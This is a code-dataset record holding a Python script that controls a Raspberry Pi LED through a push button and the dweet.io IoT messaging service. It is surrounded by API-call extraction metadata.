] | [((790, 863), 'xnat_dashboards.data_cleaning.graph_generator.GraphGenerator', 'graph_generator.GraphGenerator', (['username', 'role', 'data', "{role: ['p1', 'y']}"], {}), "(username, role, data, {role: ['p1', 'y']})\n", (820, 863), False, 'from xnat_dashboards.data_cleaning import graph_generator\n')] |
import pigpio
import signal
import requests
import logging
import json
import os
import sys
import threading
from time import sleep
from uuid import uuid1
# Global variables
BUTTON_GPIO = 23  # BCM pin wired to the push button (pull-up, falling edge)
LED_GPIO = 21  # BCM pin driving the LED
is_blinking = False  # flag polled by the blink worker thread
pi = pigpio.pi()  # connection to the local pigpio daemon
dweetFile = 'dweet_name.txt'  # persists this device's dweet thing name
dweetURL = 'https://dweet.io'
# States of the LED state machine
stateON = "ON"
stateOFF = "OFF"
stateBlink = "BLINK"
state = stateON  # current state; mutated by nextState()/processDweet()
# Logging initialization
logging.basicConfig(level=logging.WARNING) # Logging global configuration
logger = logging.getLogger('main') # Logger for this module
logger.setLevel(logging.INFO) # Logging configuration for this module's logger
# next state function
def nextState():
    """Advance the global LED state: ON -> OFF -> BLINK -> ON.

    Refactor: the three duplicated if/elif branches (each repeating the
    identical log call) are collapsed into a single transition table;
    unknown states are left untouched, exactly as before.
    """
    global state
    transitions = {stateON: stateOFF, stateOFF: stateBlink, stateBlink: stateON}
    if state in transitions:
        state = transitions[state]
        logger.info('button pressed state is changing to ' + state)
# Create or read dweet ID
def dweetID():
    """Return the persistent dweet thing name, creating it on first use."""
    if not os.path.exists(dweetFile):
        # First run: derive a short id from a uuid and persist it.
        new_id = str(uuid1())[:8]
        logger.debug('dweet ID ' + new_id)
        with open(dweetFile, 'w') as fh:
            fh.write(new_id)
        return new_id
    with open(dweetFile, 'r') as fh:
        stored = fh.read()
    logger.debug('dweet ID ' + stored)
    return stored.strip()  # strip removes any surrounding whitespace
# Sending dweet
def sendDweet(ID, stateJson):
    """Publish *stateJson* to dweet.io under thing name *ID*.

    Returns the decoded JSON reply, or {} on a non-200 response.
    """
    URL = dweetURL + '/dweet/for/' + ID
    logger.info('dweet url = ' + URL + 'json state = %s', stateJson)
    req = requests.get(URL, params=stateJson)
    if req.status_code != 200:
        logger.error('dweet request failure : %s', req.status_code)
        return {}
    payload = req.json()
    logger.info('dweet request result = %s', payload)
    return payload
# receiving dweet
def getLastDweet():
    """Fetch the most recent dweet; return its content dict or None."""
    URL = dweetURL + '/get/latest/dweet/for/' + dweetID()
    logger.debug('last dweet url = ' + URL)
    req = requests.get(URL)
    if req.status_code != 200:
        logger.error('Last dweet error %s', req.status_code)
        return None
    dweetJson = req.json()
    logger.debug('Last dweet json = %s', dweetJson)
    dweetState = None
    if dweetJson['this'] == 'succeeded':
        dweetState = dweetJson['with'][0]['content']
    return dweetState
# Setting the initialization
def init():
    """Configure button and LED GPIOs and install the Ctrl+C handler."""
    # Button initialization: input with internal pull-up, debounced,
    # callback fires on the falling edge (button press pulls the pin low).
    pi.set_mode(BUTTON_GPIO,pigpio.INPUT)
    pi.set_pull_up_down(BUTTON_GPIO,pigpio.PUD_UP)
    pi.set_glitch_filter(BUTTON_GPIO, 100000) # pigpio glitch filter is in microseconds: 100000 us = 0.1 secs
    pi.callback(BUTTON_GPIO, pigpio.FALLING_EDGE, pressed)
    # LED initialization: output, starts ON to match state = stateON
    pi.set_mode(LED_GPIO, pigpio.OUTPUT)
    pi.write(LED_GPIO, 1)
    # capture CTRL + C so we can turn the LED off before exiting
    signal.signal(signal.SIGINT, signal_handler)
# Button handler
def pressed(gpio_pin, level, tick):
    """pigpio falling-edge callback: advance state and publish it as a dweet."""
    nextState()
    logger.debug("Button pressed: state is " + state)
    thing = dweetID()
    sendDweet(thing, {'state': state})
# Processing dweet
def processDweet(dweet):
    """Apply the LED state carried in *dweet*, if present and changed."""
    global state
    global is_blinking
    if 'state' not in dweet:
        return None
    new_state = dweet['state']
    if new_state == state:
        # Nothing to do when the remote state matches ours.
        return None
    is_blinking = False
    if new_state == stateON:
        pi.write(LED_GPIO, 1)
        state = stateON
    elif new_state == stateBlink:
        blink()
        state = stateBlink
    else:
        # Any other value turns the LED off.
        state = stateOFF
        pi.write(LED_GPIO, 0)
    logger.info('dweet state after receving dweet = ' + new_state)
def print_instructions():
    """Print the dweet.io URLs that control the LED.

    Improvement: ``dweetID()`` reads a file on every call, so the thing
    name is resolved once instead of six times; output is unchanged.
    """
    thing = dweetID()
    base = dweetURL + "/dweet/for/" + thing
    print("LED Control URLs - Try them in your web browser:")
    print("  On    : " + base + "?state=ON")
    print("  Off   : " + base + "?state=OFF")
    print("  Blink : " + base + "?state=BLINK\n")
def signal_handler(sig, frame):
    """SIGINT handler: announce, turn the LED off, and exit cleanly."""
    print('You pressed Control+C')
    pi.write(LED_GPIO, 0)
    sys.exit(0)
def blink():
    """Start blinking the LED from a background daemon thread."""
    global is_blinking
    is_blinking = True

    def _blink_loop():
        # Toggle once per second until is_blinking is cleared elsewhere.
        while is_blinking:
            pi.write(LED_GPIO, 1)
            sleep(1)
            pi.write(LED_GPIO, 0)
            sleep(1)

    # daemon=True lets the main thread exit naturally when it finishes;
    # with daemon=False the process would appear to hang after the LED
    # turns off because this worker would keep the interpreter alive.
    worker = threading.Thread(
        name='LED on GPIO ' + str(LED_GPIO), target=_blink_loop, daemon=True)
    worker.start()
# Main entry point
if __name__ == '__main__':
    init()
    print_instructions()
    print('Waiting for dweets. Press Control+C to exit.')
    # Poll dweet.io every two seconds and mirror any remote state change.
    while True:
        latest = getLastDweet()
        if latest is not None:
            processDweet(latest)
        sleep(2)
| [
"logging.basicConfig",
"os.path.exists",
"logging.getLogger",
"signal.signal",
"requests.get",
"time.sleep",
"uuid.uuid1",
"pigpio.pi",
"sys.exit"
] | [((231, 242), 'pigpio.pi', 'pigpio.pi', ([], {}), '()\n', (240, 242), False, 'import pigpio\n'), ((407, 449), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.WARNING'}), '(level=logging.WARNING)\n', (426, 449), False, 'import logging\n'), ((491, 516), 'logging.getLogger', 'logging.getLogger', (['"""main"""'], {}), "('main')\n", (508, 516), False, 'import logging\n'), ((1030, 1055), 'os.path.exists', 'os.path.exists', (['dweetFile'], {}), '(dweetFile)\n', (1044, 1055), False, 'import os\n'), ((1488, 1523), 'requests.get', 'requests.get', (['URL'], {'params': 'stateJson'}), '(URL, params=stateJson)\n', (1500, 1523), False, 'import requests\n'), ((1851, 1868), 'requests.get', 'requests.get', (['URL'], {}), '(URL)\n', (1863, 1868), False, 'import requests\n'), ((2562, 2606), 'signal.signal', 'signal.signal', (['signal.SIGINT', 'signal_handler'], {}), '(signal.SIGINT, signal_handler)\n', (2575, 2606), False, 'import signal\n'), ((3795, 3806), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3803, 3806), False, 'import sys\n'), ((3930, 3938), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (3935, 3938), False, 'from time import sleep\n'), ((3967, 3975), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (3972, 3975), False, 'from time import sleep\n'), ((4645, 4653), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (4650, 4653), False, 'from time import sleep\n'), ((1224, 1231), 'uuid.uuid1', 'uuid1', ([], {}), '()\n', (1229, 1231), False, 'from uuid import uuid1\n')] |